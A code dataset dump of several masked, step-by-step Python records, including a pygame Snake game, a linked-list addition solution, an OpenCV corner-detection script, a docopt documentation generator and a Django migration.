pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\nif __name__ == '__main__':\n game = Game()\n game.run()\n",
"step-4": "from typing import Sized\nimport pygame\nimport time\nfrom pygame.locals import *\nimport random\nSIZE = 20\nBACKGROUND = 45, 34, 44\nW = 800\nH = 400\nSCREEN = W, H\n\n\nclass Snake:\n\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load('resources/snake.png').convert()\n self.snake_x = [W // 2] * length\n self.snake_y = [H // 2] * length\n self.direction = 'left'\n\n def increase_length(self):\n self.length += 1\n self.snake_x.append(0)\n self.snake_y.append(0)\n\n def draw(self):\n for i in range(self.length):\n self.parent_screen.blit(self.snake, (self.snake_x[i], self.\n snake_y[i]))\n pygame.display.flip()\n\n def move(self):\n for i in range(self.length - 1, 0, -1):\n self.snake_x[i] = self.snake_x[i - 1]\n self.snake_y[i] = self.snake_y[i - 1]\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n\nclass Food:\n\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load('resources/food.png').convert()\n self.food2 = pygame.image.load('resources/snake1.png').convert()\n self.food_x = SIZE * 3\n self.food_y = SIZE * 2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y))\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W // SIZE - 1) * SIZE\n self.food_y = random.randint(0, H // SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption('Snake Game')\n self.surface = pygame.display.set_mode(SCREEN)\n self.surface.fill(BACKGROUND)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n self.food = Food(self.surface)\n self.food.draw()\n pygame.mixer.init()\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location)\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load('resources/b_music1.mp3')\n pygame.mixer.music.play(-1)\n\n def render_background(self):\n bg = pygame.image.load('resources/background.jpg')\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n self.render_background()\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0],\n self.food.food_x, self.food.food_y):\n self.food.move()\n self.snake.increase_length()\n self.play_sound('resources/ding.mp3')\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[\n 0], self.snake.snake_x[i], self.snake.snake_y[i]):\n self.play_sound('resources/fail_buzz.mp3')\n raise 'Game Over'\n self.touch_border_action()\n\n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(f'<Paused>', True, (200, 200, 200))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Resume', \n True, (255, 255, 0))\n self.surface.blit(line1, (W // 4 + 20, H // 3))\n self.surface.blit(line2, (W // 4 + 30, H // 3 + 100))\n pygame.display.flip()\n\n def show_game_over(self):\n self.render_background()\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(f'GAME OVER !!', True, (200, 0, 0))\n line1B = font.render(f'<<Score : {self.snake.length - 3}>>', True,\n (10, 255, 10))\n line2 = font.render(f'Press <UP, DOWN, LEFT, RIGHT> To Play Again',\n True, (200, 200, 200))\n line3 = font.render(f'Press ESC to EXIT!', True, (255, 200, 0))\n self.surface.blit(line1, (W // 4 - 25, H // 3 - 45))\n self.surface.blit(line1B, (W // 4 + 100, H // 3 + 60))\n self.surface.blit(line2, (45, H // 3 + 110))\n self.surface.blit(line3, (W // 4 + 50, H // 3 + 160))\n pygame.display.flip()\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n\n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W\n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n self.food = Food(self.surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(f'[Score : {self.snake.length - 3}]', True, (0,\n 255, 255))\n self.surface.blit(score, (W // 2 - 70, 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni', 16)\n msgs1 = font.render('[SPACE] to Pause', True, (200, 204, 255))\n msgs2 = font.render('[ESC] to EXIT', True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n running = False\n if event.key == K_SPACE:\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n elif event.type == QUIT:\n running = False\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n clock.tick(60)\n\n\nif __name__ == '__main__':\n game = Game()\n game.run()\n",
"step-5": "from typing import Sized\nimport pygame\nimport time\nfrom pygame.locals import *\nimport random\n\nSIZE = 20\nBACKGROUND = (45, 34, 44)\nW = 800\nH = 400\nSCREEN = (W, H)\n\n\nclass Snake:\n def __init__(self, parent_screen, length):\n self.parent_screen = parent_screen\n self.length = length\n self.snake = pygame.image.load(\n \"resources/snake.png\").convert() # inserting snake image\n\n self.snake_x = [W//2]*length # list with 'length' number of elements\n self.snake_y = [H//2]*length\n\n self.direction = \"left\" # default direction LEFT\n\n def increase_length(self):\n self.length += 1\n\n # adds another block to snake\n # appends a random value to the list...cause it will change immidiately in 'move()' method\n self.snake_x.append(0)\n self.snake_y.append(0)\n\n def draw(self):\n # self.parent_screen.fill(BACKGROUND)\n for i in range(self.length):\n self.parent_screen.blit(\n self.snake, (self.snake_x[i], self.snake_y[i])) # drawing snake\n pygame.display.flip()\n\n def move(self):\n # Logic gor moving the TAIL snakes [like 2nd snake will come to 1st pos, 3rd will move to 2nd pos.]\n\n for i in range(self.length-1, 0, -1): # reverse for loop\n self.snake_x[i] = self.snake_x[i-1]\n self.snake_y[i] = self.snake_y[i-1]\n\n # Logic for moving the head snakes\n\n if self.direction == 'up':\n self.snake_y[0] -= SIZE\n if self.direction == 'down':\n self.snake_y[0] += SIZE\n if self.direction == 'right':\n self.snake_x[0] += SIZE\n if self.direction == 'left':\n self.snake_x[0] -= SIZE\n\n self.draw()\n\n def move_up(self):\n self.direction = 'up'\n\n def move_down(self):\n self.direction = 'down'\n\n def move_right(self):\n self.direction = 'right'\n\n def move_left(self):\n self.direction = 'left'\n\n# Apple class\n\n\nclass Food:\n def __init__(self, parent_screen):\n self.parent_screen = parent_screen\n self.food1 = pygame.image.load(\n \"resources/food.png\").convert() # inserting food image\n self.food2 = pygame.image.load(\n \"resources/snake1.png\").convert() \n\n self.food_x = SIZE*3\n self.food_y = SIZE*2\n\n def draw(self):\n seq = [self.food1, self.food2]\n self.parent_screen.blit(random.choice(seq), (self.food_x, self.food_y)) # drawing snake\n pygame.display.flip()\n\n def move(self):\n self.food_x = random.randint(0, W//SIZE - 1) * SIZE\n self.food_y = random.randint(0, H//SIZE - 1) * SIZE\n\n\nclass Game:\n\n def __init__(self):\n pygame.init()\n pygame.display.set_caption(\"Snake Game\")\n\n self.surface = pygame.display.set_mode(\n SCREEN) # crating game window 1000x720\n self.surface.fill(BACKGROUND) # rgb color combination\n\n # snake object (surface, size_of_snake)\n self.snake = Snake(self.surface, 3)\n self.snake.draw()\n\n self.food = Food(self.surface) # Food object(Surface)\n self.food.draw()\n\n pygame.mixer.init() # pygame class mixer...for sound\n\n # start playing background b_music\n self.background_music()\n\n def is_collision(self, x1, y1, x2, y2):\n if x1 >= x2 and x1 < x2 + SIZE:\n if y1 >= y2 and y1 < y2 + SIZE:\n return True\n\n else:\n return False\n\n def play_sound(self, sound_location):\n sound = pygame.mixer.Sound(sound_location) # sound is for short time\n pygame.mixer.Sound.play(sound)\n\n def background_music(self):\n pygame.mixer.music.load(\"resources/b_music1.mp3\")\n pygame.mixer.music.play(-1) #plays music infinitely\n\n def render_background(self):\n bg = pygame.image.load(\"resources/background.jpg\")\n self.surface.blit(bg, (0, 0))\n\n def play(self):\n\n self.render_background() # render the background\n self.snake.move()\n self.food.draw()\n self.display_score()\n self.screen_msgs()\n pygame.display.flip()\n\n # Snake colloding with apple\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0], self.food.food_x, self.food.food_y):\n self.food.move() # moves apple to random position\n self.snake.increase_length()\n # play sound when eating the food\n self.play_sound(\"resources/ding.mp3\") # passing the music location\n # to play the sound\n\n # Snake colliding with itself Game Over logic\n for i in range(2, self.snake.length):\n if self.is_collision(self.snake.snake_x[0], self.snake.snake_y[0], self.snake.snake_x[i], self.snake.snake_y[i]):\n # play sound when game Over\n self.play_sound(\"resources/fail_buzz.mp3\")\n\n raise \"Game Over\" # raising exeption\n \n self.touch_border_action()\n \n def pause_msg(self):\n font = pygame.font.SysFont('arial', 20)\n font1 = pygame.font.SysFont('Rockwell', 80)\n line1 = font1.render(\n f\"<Paused>\", True, (200, 200, 200))\n line2 = font.render(\n f\"Press <UP, DOWN, LEFT, RIGHT> To Resume\", True, (255,255, 0))\n self.surface.blit(line1, (W//4 + 20, H//3))\n self.surface.blit(line2, (W//4 + 30, H//3 + 100))\n\n pygame.display.flip()\n\n def show_game_over(self):\n # self.surface.fill(BACKGROUND)\n self.render_background()\n\n font = pygame.font.SysFont('Cooper Black', 30)\n font1 = pygame.font.SysFont('Cooper Black', 60)\n line1 = font1.render(\n f\"GAME OVER !!\", True, (200, 0, 0))\n line1B = font.render(\n f\"<<Score : {self.snake.length - 3}>>\", True, (10, 255, 10))\n\n line2 = font.render(\n f\"Press <UP, DOWN, LEFT, RIGHT> To Play Again\", True, (200, 200, 200))\n line3 = font.render(\n f\"Press ESC to EXIT!\", True, (255, 200, 0))\n\n self.surface.blit(line1, (W//4 - 25, H//3-45))\n self.surface.blit(line1B, (W//4 + 100, H//3 + 60))\n self.surface.blit(line2, (45, H//3 + 110))\n self.surface.blit(line3, (W//4+50, H//3 + 160))\n\n pygame.display.flip()\n # pause the background_music when game over\n pygame.mixer.music.rewind()\n pygame.mixer.music.pause()\n \n def touch_border_action(self):\n if self.snake.snake_x[0] == W:\n self.snake.snake_x[0] = 0\n elif self.snake.snake_x[0] < 0:\n self.snake.snake_x[0] = W \n \n if self.snake.snake_y[0] == H:\n self.snake.snake_y[0] = 0\n elif self.snake.snake_y[0] < 0:\n self.snake.snake_y[0] = H\n\n def reset_game(self):\n self.snake = Snake(self.surface, 3)\n\n self.food = Food(self.surface) # Food object(Surface)\n\n def display_score(self):\n font = pygame.font.SysFont('Algerian', 30)\n score = font.render(\n f\"[Score : {self.snake.length - 3}]\", True, (0, 255, 255))\n self.surface.blit(score, (W //2 - 70 , 5))\n\n def screen_msgs(self):\n font = pygame.font.SysFont('aharoni',16)\n msgs1 = font.render(\"[SPACE] to Pause\", True, (200, 204, 255))\n msgs2 = font.render(\"[ESC] to EXIT\", True, (200, 204, 255))\n self.surface.blit(msgs1, (W - 100, H - 20))\n self.surface.blit(msgs2, (10, H - 20))\n\n def run(self):\n clock = pygame.time.Clock()\n running = True\n pause_game = False\n while running:\n\n for event in pygame.event.get():\n if event.type == KEYDOWN:\n if event.key == K_ESCAPE: # PRESS esc to escape the screen\n running = False\n if event.key == K_SPACE: # to pause the game\n pygame.mixer.music.pause()\n self.pause_msg()\n pause_game = True\n\n if event.key == K_UP:\n self.snake.move_up()\n pause_game = False\n pygame.mixer.music.unpause()\n\n if event.key == K_DOWN:\n self.snake.move_down()\n pause_game = False\n pygame.mixer.music.unpause()\n\n if event.key == K_LEFT:\n self.snake.move_left()\n pause_game = False\n pygame.mixer.music.unpause()\n\n if event.key == K_RIGHT:\n self.snake.move_right()\n pause_game = False\n pygame.mixer.music.unpause()\n\n elif event.type == QUIT:\n running = False\n\n if not pause_game:\n try:\n self.play()\n except Exception as e:\n self.show_game_over()\n pause_game = True\n self.reset_game()\n\n clock.tick(60)\n\n\nif __name__ == \"__main__\":\n\n game = Game() # Game class object\n game.run()\n\n # auto-py-to-exe.exe # run this commande to convert to exe\n",
"step-ids": [
17,
26,
29,
30,
31
]
}
|
[
17,
26,
29,
30,
31
] |
<|reserved_special_token_0|>
class Solution:
<|reserved_special_token_0|>
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
<|reserved_special_token_1|>
class ListNode(object):
<|reserved_special_token_0|>
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
<|reserved_special_token_1|>
class ListNode(object):
def __init__(self, val, next=None):
self.val = val
self.next = next
class Solution:
"""
@param l1: the first list
@param l2: the second list
@return: the sum list of l1 and l2
"""
def addLists(self, l1, l2):
res = ListNode(0)
p = res
carry = 0
while l1 or l2 or carry:
num = 0
if l1:
num += l1.val
l1 = l1.next
if l2:
num += l2.val
l2 = l2.next
num += carry
digit, carry = num % 10, num // 10
node = ListNode(digit)
p.next = node
p = p.next
return res.next
|
flexible
|
{
"blob_id": "8909ee9c54a234222a41249e1f3005fd86e21cf0",
"index": 1782,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-2": "<mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-3": "class ListNode(object):\n <mask token>\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-4": "class ListNode(object):\n\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n \"\"\"\n @param l1: the first list\n @param l2: the second list\n @return: the sum list of l1 and l2\n \"\"\"\n\n def addLists(self, l1, l2):\n res = ListNode(0)\n p = res\n carry = 0\n while l1 or l2 or carry:\n num = 0\n if l1:\n num += l1.val\n l1 = l1.next\n if l2:\n num += l2.val\n l2 = l2.next\n num += carry\n digit, carry = num % 10, num // 10\n node = ListNode(digit)\n p.next = node\n p = p.next\n return res.next\n",
"step-5": null,
"step-ids": [
2,
3,
4,
5
]
}
|
[
2,
3,
4,
5
] |
import numpy as np
import cv2
import sys
import math
cap = cv2.VideoCapture(0)
while(True):
_, img = cap.read()
#gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
img = cv2.imread("zielfeld_mit_Zeugs_2.png")
#img = cv2.imread("zielfeld_mit_Zeugs_2.jpg")
#imS = cv2.resize(img, (480, 480))
# img[img] = [255]
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
ret,thresh1 = cv2.threshold(gray,70,255,cv2.THRESH_BINARY)
th2 = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,11,2)
th3 = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,11,2)
upper = 120
lower_red = np.array([1,1,1])
upper_red = np.array([upper,upper,upper])
mask = cv2.inRange(hsv, lower_red, upper_red)
maskedImg = cv2.bitwise_and(img,img, mask= mask)
thresh1_d = cv2.dilate(maskedImg,None)
thresh1_e = cv2.erode(thresh1_d, None)
# cv2.imshow('video_1',gray)
dst = cv2.cornerHarris(np.float32(gray),2,3,0.04)
#result is dilated for marking the corners, not important
dst = cv2.dilate(dst,None)
edge_indices = np.transpose(np.where(dst>=0.01*dst.max()))
#for i in edge_indices:
#img[i[0],i[1]]=[0,255,0]
ret, dst = cv2.threshold(dst,0.01*dst.max(),255,0)
dst = np.uint8(dst)
# find centroids
ret, labels, stats, centroids = cv2.connectedComponentsWithStats(dst)
# define the criteria to stop and refine the corners
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.001)
corners = cv2.cornerSubPix(gray,np.float32(centroids),(5,5),(-1,-1),criteria)
# Now draw them
res = np.hstack((centroids,corners))
res = np.int0(res)
res = res[res[:,1].argsort()]
num_edges = len(res)
required_matches = 4
threshold = 10
prev_dist = 0
dist_to_nearest = sys.maxint
num_matches = 0
next_idx = 0;
i = 0
while i < int(math.ceil(num_edges/float(2))):
idxs = [i+1,i+2,num_edges-i-1, num_edges-i-2]
for j in idxs:
d1 = int(math.fabs(res[i,0]-res[j,0]))+int(math.fabs(res[i,1]-res[j,1]))
if d1 < dist_to_nearest:
dist_to_nearest = d1
next_idx = j;
within_threshold = (prev_dist+threshold) > dist_to_nearest and (prev_dist-threshold) < dist_to_nearest
print i,next_idx, dist_to_nearest
if i == 0:
within_threshold = True
prev_dist = dist_to_nearest
if within_threshold:
img[res[i,1],res[i,0]]=[0,0,255]
num_matches += 1
if num_matches == required_matches:
break
i = next_idx
else:
prev_dist = dist_to_nearest
num_matches = 0
i += 1
dist_to_nearest = sys.maxint
# img[res[i,1],res[i,0]]=[0,255,0]
#img[res[len(res)-1,1],res[len(res)-1,0]]=[0,255,0]
## res = res[1:]
## for i1 in range(len(res)/2):
## h_y = (res[i1][1] + res[len(res)-i1-1][1]) / 2
##
## a = res[res[:,0].argsort()]
## h_x = (a[0][1] + a[len(a)-1][1]) / 2
##
## img[h_y][h_x-10:h_x+10]=[0,0,255]
#cv2.line(img,(res[0][0], res[0][1]),(res[len(res)-1][0],res[len(res)-1][1]),(255,0,0),5)
# cv2.line(img,(a[0][0], a[0][1]),(a[len(a)-1][0],a[len(a)-1][1]),(0,0,255),5)
cv2.imshow('video',img)
if cv2.waitKey(1)==27:# esc Key
break
cap.release()
cv2.destroyAllWindows()
|
normal
|
{
"blob_id": "3f5ae2b25fc506b980de3ee87c952ff699e10003",
"index": 4977,
"step-1": "import numpy as np\r\nimport cv2\r\nimport sys\r\nimport math\r\n\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile(True):\r\n _, img = cap.read()\r\n #gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n\r\n img = cv2.imread(\"zielfeld_mit_Zeugs_2.png\")\r\n #img = cv2.imread(\"zielfeld_mit_Zeugs_2.jpg\")\r\n #imS = cv2.resize(img, (480, 480))\r\n\r\n # img[img] = [255]\r\n \r\n \r\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n ret,thresh1 = cv2.threshold(gray,70,255,cv2.THRESH_BINARY)\r\n th2 = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY,11,2)\r\n th3 = cv2.adaptiveThreshold(gray,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY,11,2)\r\n\r\n upper = 120\r\n lower_red = np.array([1,1,1])\r\n upper_red = np.array([upper,upper,upper])\r\n \r\n mask = cv2.inRange(hsv, lower_red, upper_red)\r\n maskedImg = cv2.bitwise_and(img,img, mask= mask)\r\n\r\n thresh1_d = cv2.dilate(maskedImg,None)\r\n thresh1_e = cv2.erode(thresh1_d, None)\r\n\r\n \r\n # cv2.imshow('video_1',gray)\r\n \r\n dst = cv2.cornerHarris(np.float32(gray),2,3,0.04)\r\n \r\n #result is dilated for marking the corners, not important\r\n dst = cv2.dilate(dst,None)\r\n \r\n edge_indices = np.transpose(np.where(dst>=0.01*dst.max()))\r\n\r\n #for i in edge_indices:\r\n #img[i[0],i[1]]=[0,255,0]\r\n\r\n \r\n ret, dst = cv2.threshold(dst,0.01*dst.max(),255,0)\r\n dst = np.uint8(dst)\r\n\r\n # find centroids\r\n ret, labels, stats, centroids = cv2.connectedComponentsWithStats(dst)\r\n\r\n # define the criteria to stop and refine the corners\r\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 100, 0.001)\r\n corners = cv2.cornerSubPix(gray,np.float32(centroids),(5,5),(-1,-1),criteria)\r\n\r\n\r\n \r\n # Now draw them\r\n res = np.hstack((centroids,corners))\r\n res = np.int0(res)\r\n\r\n \r\n res = res[res[:,1].argsort()]\r\n \r\n num_edges = len(res)\r\n required_matches = 4\r\n threshold = 10\r\n \r\n prev_dist = 0\r\n dist_to_nearest = sys.maxint\r\n num_matches = 0\r\n next_idx = 0;\r\n i = 0\r\n while i < int(math.ceil(num_edges/float(2))):\r\n idxs = [i+1,i+2,num_edges-i-1, num_edges-i-2]\r\n \r\n for j in idxs: \r\n d1 = int(math.fabs(res[i,0]-res[j,0]))+int(math.fabs(res[i,1]-res[j,1]))\r\n \r\n if d1 < dist_to_nearest:\r\n dist_to_nearest = d1\r\n next_idx = j;\r\n \r\n within_threshold = (prev_dist+threshold) > dist_to_nearest and (prev_dist-threshold) < dist_to_nearest \r\n print i,next_idx, dist_to_nearest\r\n if i == 0:\r\n within_threshold = True\r\n prev_dist = dist_to_nearest\r\n\r\n if within_threshold:\r\n \r\n img[res[i,1],res[i,0]]=[0,0,255]\r\n \r\n num_matches += 1\r\n \r\n if num_matches == required_matches:\r\n break\r\n i = next_idx\r\n \r\n \r\n else:\r\n \r\n \r\n prev_dist = dist_to_nearest\r\n \r\n num_matches = 0\r\n i += 1\r\n dist_to_nearest = sys.maxint\r\n \r\n # img[res[i,1],res[i,0]]=[0,255,0]\r\n \r\n #img[res[len(res)-1,1],res[len(res)-1,0]]=[0,255,0]\r\n\r\n## res = res[1:]\r\n## for i1 in range(len(res)/2):\r\n## h_y = (res[i1][1] + res[len(res)-i1-1][1]) / 2\r\n## \r\n## a = res[res[:,0].argsort()]\r\n## h_x = (a[0][1] + a[len(a)-1][1]) / 2\r\n## \r\n## img[h_y][h_x-10:h_x+10]=[0,0,255]\r\n\r\n \r\n #cv2.line(img,(res[0][0], res[0][1]),(res[len(res)-1][0],res[len(res)-1][1]),(255,0,0),5)\r\n \r\n \r\n # cv2.line(img,(a[0][0], a[0][1]),(a[len(a)-1][0],a[len(a)-1][1]),(0,0,255),5)\r\n \r\n\r\n cv2.imshow('video',img)\r\n if cv2.waitKey(1)==27:# esc Key\r\n break\r\n\r\ncap.release() \r\ncv2.destroyAllWindows()\r\n\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/env python
"""
Usage:
generate-doc <layer-definition>
generate-doc --help
generate-doc --version
Options:
--help Show this screen.
--version Show version.
"""
from docopt import docopt
import openmaptiles
from openmaptiles.tileset import Layer
from openmaptiles.docs import collect_documentation
if __name__ == '__main__':
args = docopt(__doc__, version=openmaptiles.__version__)
layer = Layer.parse(args['<layer-definition>'])
markdown = collect_documentation(layer)
print(markdown)
|
normal
|
{
"blob_id": "991b894c4c0fb9cb90aef0542227e001a3a3bb0d",
"index": 9651,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n args = docopt(__doc__, version=openmaptiles.__version__)\n layer = Layer.parse(args['<layer-definition>'])\n markdown = collect_documentation(layer)\n print(markdown)\n",
"step-3": "<mask token>\nfrom docopt import docopt\nimport openmaptiles\nfrom openmaptiles.tileset import Layer\nfrom openmaptiles.docs import collect_documentation\nif __name__ == '__main__':\n args = docopt(__doc__, version=openmaptiles.__version__)\n layer = Layer.parse(args['<layer-definition>'])\n markdown = collect_documentation(layer)\n print(markdown)\n",
"step-4": "#!/usr/bin/env python\n\"\"\"\nUsage:\n generate-doc <layer-definition>\n generate-doc --help\n generate-doc --version\nOptions:\n --help Show this screen.\n --version Show version.\n\"\"\"\nfrom docopt import docopt\nimport openmaptiles\nfrom openmaptiles.tileset import Layer\nfrom openmaptiles.docs import collect_documentation\n\n\nif __name__ == '__main__':\n args = docopt(__doc__, version=openmaptiles.__version__)\n layer = Layer.parse(args['<layer-definition>'])\n markdown = collect_documentation(layer)\n print(markdown)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 2.1.7 on 2019-04-01 14:37
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('submissions', '0004_auto_20190401_1834'),
]
operations = [
migrations.AlterField(
model_name='mainsubmission',
name='execution_time',
field=models.DecimalField(blank=True, decimal_places=3, default=0, max_digits=6, null=True),
),
]
|
normal
|
{
"blob_id": "3fed8723d215bce3cf391752e07ca85b2d6701a3",
"index": 3410,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('submissions', '0004_auto_20190401_1834')]\n operations = [migrations.AlterField(model_name='mainsubmission', name=\n 'execution_time', field=models.DecimalField(blank=True,\n decimal_places=3, default=0, max_digits=6, null=True))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('submissions', '0004_auto_20190401_1834')]\n operations = [migrations.AlterField(model_name='mainsubmission', name=\n 'execution_time', field=models.DecimalField(blank=True,\n decimal_places=3, default=0, max_digits=6, null=True))]\n",
"step-5": "# Generated by Django 2.1.7 on 2019-04-01 14:37\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('submissions', '0004_auto_20190401_1834'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='mainsubmission',\n name='execution_time',\n field=models.DecimalField(blank=True, decimal_places=3, default=0, max_digits=6, null=True),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
TABLE_NAME = 'active_module'
|
normal
|
{
"blob_id": "ff3962d875da8e3f9e6c3178b1a8191ebb8a7b60",
"index": 3639,
"step-1": "<mask token>\n",
"step-2": "TABLE_NAME = 'active_module'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
__version__ = '0.90.03'
|
normal
|
{
